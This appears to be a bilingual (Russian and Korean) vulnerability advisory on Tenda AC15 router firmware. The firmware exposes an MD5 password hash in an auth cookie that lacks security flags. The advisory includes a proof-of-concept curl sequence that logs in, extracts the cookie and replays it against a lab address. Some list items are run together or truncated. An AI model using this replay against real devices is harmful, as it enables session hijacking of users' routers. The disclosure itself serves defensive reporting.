
Tenda AC15 cookie exposure
Прошивка Tenda AC15 версии V15.03.05.18_multi выдает аутентификационный cookie в форме password=<MD5(пароль)><6-символьный суффикс> и возвращает его без флагов HttpOnly, Secure или SameSite, что приводит к раскрытию хеша пароля на стороне клиента.
Суффикс с низкой энтропией выступает в качестве предсказуемого идентификатора сессии, что позволяет злоумышленникам повторно использовать или перехватывать сессии.
/login/Auth выдает cookie password=<MD5(пароль)><6-символьный суффикс>.HttpOnly, Secure, SameSite).document.cookie) и повторно использован в запросах к /main.html.PW_HASH=$(echo -n 'ringzer0' | md5sum | cut -d' ' -f1)
curl -v --compressed -c cookies.txt -D headers.txt -X POST \
"http://192.168.141.128:20080/login/Auth" \
-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
--data "username=admin&password=${PW_HASH}"
COOKIE=$(awk 'NF && $0!~/^#/ {print $6"="$7; exit}' cookies.txt)
curl -s -i -H "Cookie: ${COOKIE}" "http://192.168.141.128:20080/main.html" | sed -n '1,40p'
HttpOnly, Secure и SameSite к аутентификационным cookie.Tenda AC15 펌웨어 V15.03.05.18_multi 버전은 password=<MD5(password)><6자리 접미사> 형태의 인증 쿠키를 발급하며, HttpOnly, Secure, SameSite 플래그 없이 반환하여 비밀번호 해시가 클라이언트에 노출됩니다.
짧은 엔트로피의 접미사는 예측 가능한 세션 식별자로 작동하여 세션 재사용 또는 하이재킹이 가능합니다.
/login/Auth는 password=<MD5(password)><6자리 접미사> 형태의 쿠키를 발급함.HttpOnly, Secure, SameSite 플래그가 없음.document.cookie)로 쿠키를 읽어 /main.html 요청 시 재사용 가능.PW_HASH=$(echo -n 'ringzer0' | md5sum | cut -d' ' -f1)
curl -v --compressed -c cookies.txt -D headers.txt -X POST \
"http://192.168.141.128:20080/login/Auth" \
-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
--data "username=admin&password=${PW_HASH}"
COOKIE=$(awk 'NF && $0!~/^#/ {print $6"="$7; exit}' cookies.txt)
curl -s -i -H "Cookie: ${COOKIE}" "http://192.168.141.128:20080/main.html" | sed -n '1,40p'
HttpOnly, Secure, SameSite 플래그를 적용할 것.